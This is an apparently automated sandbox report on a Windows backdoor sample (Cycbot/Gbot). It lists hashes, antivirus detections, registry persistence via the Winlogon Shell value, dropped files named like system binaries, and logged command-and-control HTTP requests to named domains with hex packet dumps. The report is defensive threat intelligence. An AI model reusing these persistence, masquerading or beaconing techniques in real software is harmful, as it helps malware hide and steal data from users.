Analysis Date2014-10-12 23:19:26
MD5c779de34341460a67c5aae67a5f4d6ec
SHA1dbff12560e9a6cb508f9d9c321fca81dc6162161

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 2ab539af811b1ee3e16419a15f8763c9 sha1: d2d56a59ce292cc80fcf68c143edb62f18177c8d size: 134144
Section.rdata md5: fd524ed2bb7adb30c86282558ac2cc2d sha1: c3927baed7cde8c8c21bdb8421171f55d63eab1f size: 4096
Section.data md5: 44df41a719748fffac03b98a0d825022 sha1: 1a30d11545b65a7cfe531b85e3bc7fdfd9002df5 size: 45056
Section.crt md5: 65298f3d281ee69e8dbe8149a1f8c6df sha1: 81d22f2b2e8d965d71b8ad58630d101f509d2919 size: 512
Timestamp2005-11-03 04:38:18
VersionPrivateBuild: 1509
PEhash4d197ff4ce634c11967a9edd5ce621fa6d9e055b
IMPhashca2a7ba1e05628a65fc991340c698ebb
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/Gbot.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Agent-539638
AVDr. WebTrojan.Siggen2.15624
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.JWH
AVFortinetW32/Kryptik.K!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Cryptic.CAM
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Pakes.oli
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/Cycbot.BH
AVRisingTrojan.Win32.Generic.1273EA83
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen
AVTrend MicroBKDR_CYCBOT.SMIB
AVVirusBlokAda (vba32)Trojan.Pakes
AVYara APTno_virus
AVZillya!Trojan.Pakes.Win32.9399

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS127.0.0.1
Winsock DNSzoneij.com
Winsock DNS136136.com
Winsock DNSzonedg.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS136136.com
Type: A
61.129.70.87
DNSzonedg.com
Type: A
141.8.225.80
DNSzonetf.com
Type: A
141.8.225.80
DNSzoneij.com
Type: A
HTTP GEThttp://136136.com/LB5000/CGI-BIN/s.cgi?tq=gP4aKydkv3VGGBNcIs0yiHq6Qq7dokGPa1em2%2Bwsu1mzedMoJ2yrmwRebmx8IJJtHapXydV2mKyvHFnhFQ8%2BdAFZitF%2F9uNLzFk1mWrrfeBjKhlvCkaSPdQStoAOP7YSkcYpZS8yfZb2uZP5KZWPFw4xF9qQHYzpkJNaT3O0wjIR8WtokX3eGiGgxWLusum67yLxduqZZkPc6%2BHjZGEnaZCE5ZrQHj4qvBaW%2BgYIjE5%2By6kTvPGRK%2F0ImwScegzjKcBw%2B0gpUrOgszNgwYFFd7kR%2FCH98OdNTtJnmRJl2BWpvPLxkKIrb0ZKM3TZmT%2FPTb7k9hckRvYCD4kuSNZqNUcZW3%2BZmZhSROdPLLhNrbeSwUgACK%2Bq6C1mjpQkCGL%2BVu3QZ3gJOvuC%2BNJP8nAUqmsa%2B3QjFEE6ojTNuNh%2FCRR62JlCJOnQloIdsII906VuQV3xS1rYNrPhgy%2BCwl7F0wTW3F%2BbZQHDXssiNXI85jvfCva35WEcemTumU7k7tghFQ6Iob%2BSOj7emoBItIJ8syRN
User-Agent: iamx/3.11
HTTP GEThttp://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvEq3ejbwvgS917V65rJqlLfgPiWW1cg
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 61.129.70.87:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f4c4235 3030302f 4347492d   GET /LB5000/CGI-
0x00000010 (00016)   42494e2f 732e6367 693f7471 3d675034   BIN/s.cgi?tq=gP4
0x00000020 (00032)   614b7964 6b763356 4747424e 63497330   aKydkv3VGGBNcIs0
0x00000030 (00048)   79694871 36517137 646f6b47 50613165   yiHq6Qq7dokGPa1e
0x00000040 (00064)   6d322532 42777375 316d7a65 644d6f4a   m2%2Bwsu1mzedMoJ
0x00000050 (00080)   3279726d 77526562 6d783849 4a4a7448   2yrmwRebmx8IJJtH
0x00000060 (00096)   61705879 6456326d 4b797648 466e6846   apXydV2mKyvHFnhF
0x00000070 (00112)   51382532 42644146 5a697446 25324639   Q8%2BdAFZitF%2F9
0x00000080 (00128)   754e4c7a 466b316d 57727266 65426a4b   uNLzFk1mWrrfeBjK
0x00000090 (00144)   686c7643 6b615350 64515374 6f414f50   hlvCkaSPdQStoAOP
0x000000a0 (00160)   3759536b 6359705a 53387966 5a623275   7YSkcYpZS8yfZb2u
0x000000b0 (00176)   5a50354b 5a575046 77347846 39715148   ZP5KZWPFw4xF9qQH
0x000000c0 (00192)   597a706b 4a4e6154 334f3077 6a495238   YzpkJNaT3O0wjIR8
0x000000d0 (00208)   57746f6b 58336547 69476778 574c7573   WtokX3eGiGgxWLus
0x000000e0 (00224)   756d3637 794c7864 75715a5a 6b506336   um67yLxduqZZkPc6
0x000000f0 (00240)   25324248 6a5a4745 6e615a43 45355a72   %2BHjZGEnaZCE5Zr
0x00000100 (00256)   51486a34 71764261 57253242 6759496a   QHj4qvBaW%2BgYIj
0x00000110 (00272)   45352532 4279366b 54765047 524b2532   E5%2By6kTvPGRK%2
0x00000120 (00288)   4630496d 77536365 677a6a4b 63427725   F0ImwScegzjKcBw%
0x00000130 (00304)   32423067 7055724f 67737a4e 67775946   2B0gpUrOgszNgwYF
0x00000140 (00320)   4664376b 52253246 43483938 4f644e54   Fd7kR%2FCH98OdNT
0x00000150 (00336)   744a6e6d 524a6c32 42577076 504c786b   tJnmRJl2BWpvPLxk
0x00000160 (00352)   4b497262 305a4b4d 33545a6d 54253246   KIrb0ZKM3TZmT%2F
0x00000170 (00368)   50546237 6b396863 6b527659 4344346b   PTb7k9hckRvYCD4k
0x00000180 (00384)   75534e5a 714e5563 5a573325 32425a6d   uSNZqNUcZW3%2BZm
0x00000190 (00400)   5a685352 4f64504c 4c684e72 62655377   ZhSROdPLLhNrbeSw
0x000001a0 (00416)   55674143 4b253242 71364331 6d6a7051   UgACK%2Bq6C1mjpQ
0x000001b0 (00432)   6b43474c 25324256 7533515a 33674a4f   kCGL%2BVu3QZ3gJO
0x000001c0 (00448)   76754325 32424e4a 50386e41 55716d73   vuC%2BNJP8nAUqms
0x000001d0 (00464)   61253242 33516a46 4545366f 6a544e75   a%2B3QjFEE6ojTNu
0x000001e0 (00480)   4e682532 46435252 36324a6c 434a4f6e   Nh%2FCRR62JlCJOn
0x000001f0 (00496)   516c6f49 64734949 39303656 75515633   QloIdsII906VuQV3
0x00000200 (00512)   78533172 594e7250 68677925 32424377   xS1rYNrPhgy%2BCw
0x00000210 (00528)   6c374630 77545733 46253242 625a5148   l7F0wTW3F%2BbZQH
0x00000220 (00544)   44587373 694e5849 38356a76 66437661   DXssiNXI85jvfCva
0x00000230 (00560)   33355745 63656d54 756d5537 6b377467   35WEcemTumU7k7tg
0x00000240 (00576)   68465136 496f6225 3242534f 6a37656d   hFQ6Iob%2BSOj7em
0x00000250 (00592)   6f424974 494a3873 79524e20 48545450   oBItIJ8syRN HTTP
0x00000260 (00608)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x00000270 (00624)   3a20636c 6f73650d 0a486f73 743a2031   : close..Host: 1
0x00000280 (00640)   33363133 362e636f 6d0d0a41 63636570   36136.com..Accep
0x00000290 (00656)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x000002a0 (00672)   6e743a20 69616d78 2f332e31 310d0a0d   nt: iamx/3.11...
0x000002b0 (00688)   0a                                    .

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427645 7133656a 62777667 53393137   fBvEq3ejbwvgS917
0x00000040 (00064)   56363572 4a716c4c 66675069 57573163   V65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206961 6d782f33   er-Agent: iamx/3
0x000000a0 (00160)   2e31310d 0a0d0a                       .11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a72792e   on: close....ry.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a4c 4c684e72 62655377   /html>.LLhNrbeSw
0x000001a0 (00416)   55674143 4b253242 71364331 6d6a7051   UgACK%2Bq6C1mjpQ
0x000001b0 (00432)   6b43474c 25324256 7533515a 33674a4f   kCGL%2BVu3QZ3gJO
0x000001c0 (00448)   76754325 32424e4a 50386e41 55716d73   vuC%2BNJP8nAUqms
0x000001d0 (00464)   61253242 33516a46 4545366f 6a544e75   a%2B3QjFEE6ojTNu
0x000001e0 (00480)   4e682532 46435252 36324a6c 434a4f6e   Nh%2FCRR62JlCJOn
0x000001f0 (00496)   516c6f49 64734949 39303656 75515633   QloIdsII906VuQV3
0x00000200 (00512)   78533172 594e7250 68677925 32424377   xS1rYNrPhgy%2BCw
0x00000210 (00528)   6c374630 77545733 46253242 625a5148   l7F0wTW3F%2BbZQH
0x00000220 (00544)   44587373 694e5849 38356a76 66437661   DXssiNXI85jvfCva
0x00000230 (00560)   33355745 63656d54 756d5537 6b377467   35WEcemTumU7k7tg
0x00000240 (00576)   68465136 496f6225 3242534f 6a37656d   hFQ6Iob%2BSOj7em
0x00000250 (00592)   6f424974 494a3873 79524e20 48545450   oBItIJ8syRN HTTP
0x00000260 (00608)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x00000270 (00624)   3a20636c 6f73650d 0a486f73 743a2031   : close..Host: 1
0x00000280 (00640)   33363133 362e636f 6d0d0a41 63636570   36136.com..Accep
0x00000290 (00656)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x000002a0 (00672)   6e743a20 69616d78 2f332e31 310d0a0d   nt: iamx/3.11...
0x000002b0 (00688)   0a                                    .


Strings
..
.
.
.J
.
040904b0
1509
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
0hXgJi
16.Rbx
34MgNc
?3~SnT
4*dS4%
-;[4U`
:6A">rv
6IC*Dh
=[*7Hf
7U"phF~
_8o+DG
>" 9q~
ADVAPI32.dll
AlphaBlend
b0J3-7l
BA/'12
bEGRu5J
/]BJ||:s
*-BqNA
B**UT`
'-b,*wB8
CharNextA
CheckDlgButton
CloseHandle
CoCreateInstance
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CreateDialogParamA
CreateFontIndirectA
@.data
DeleteCriticalSection
DeleteObject
DestroyWindow
DisableThreadLibraryCalls
{!Dn1_f
D?Vsbps
E"Hr.V
[eN:-0
EnableWindow
EnterCriticalSection
EnumResourceNamesW
;(e]V6
ExitProcess
faZ#^Y
f"cF|{
F.hem@
FindResourceA
FlushFileBuffers
FlushInstructionCache
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
g[A]D2
GDI32.dll
GetACP
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetDialogBaseUnits
GetDlgItem
GetDlgItemTextA
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetProcessHeap
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemInfo
GetSystemTimeAsFileTime
GetTextExtentPointA
GetTextMetricsA
GetThreadLocale
GetTickCount
GetVersionExA
gg:I}5
:g};sF
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
H!f},R
/-hh\<
hhlFre
hhLoad
];hlU%
*.hnl@
hP.hSq@
Htu(yp|
H-U76O7
*hxHl&
+^hx(Y
$I0=g_
iK*y{W
InitializeCriticalSection
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
ioBd/[
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsDBCSLeadByte
IsDialogMessageA
IsDlgButtonChecked
IsWindow
[^JH}O
JRxx-K
KERNEL32.dll
kSURM`
-:k<u'
kZ7^]I
l8%#~D
LCMapStringA
LCMapStringW
LeaveCriticalSection
lM;%_g
LoadLibraryA
LoadLibraryExA
LoadResource
LockResource
|lo]Km
lstrcatA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
lstrlenW
l^-[tU
***MmW
MoveWindow
MSIMG32.dll
MulDiv
MultiByteToWideChar
MY$/\*
M/*y60
:^m~'yc
NTqI	Z
N<}Z4(
O}J>u]
ojx	ms/
ole32.dll
	O,,#M2
PathFindExtensionA
pIz53@
@@pJD9
q$5C p
qgj	}}
/*qrQy7u|
QueryPerformanceCounter
RaiseException
rc?Pv/
`.rdata
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegSetValueExA
ReleaseDC
RtlUnwind
^SC$$wO
SelectObject
SendMessageA
SetDlgItemTextA
SetFilePointer
SetHandleCount
SetHandleInformation
SetLastError
SetStdHandle
SetUnhandledExceptionFilter
SetWindowLongA
SHLWAPI.dll
ShowWindow
SizeofResource
S&NF;nf
Sngmrc
StringFromGUID2
TerminateProcess
!This program cannot be run in DOS mode.
ThlAll
T$HPRj
tk3mg;
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tmz7zU
TransmitCommChar
TransparentBlt
UnhandledExceptionFilter
UnregisterClassA
USER32.dll
U)]x<.
v^13Bk
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
vj@{->
vl9#;/
Vmm[vnN
VQOe89
/VU\kr
W5u94O:cO
WideCharToMultiByte
WinHelpA
Wixa^H
?W>j`((
WriteFile
:x2*>t
x>~6c{Z>8
$	-x_%8
#xQO"g
\;Xwz$
Y.h}|@
*YXwJ_=
z9/0A;
Z~B0'V
ZBD+^{
~ZEiMF
ZEv4iM
[.)zLj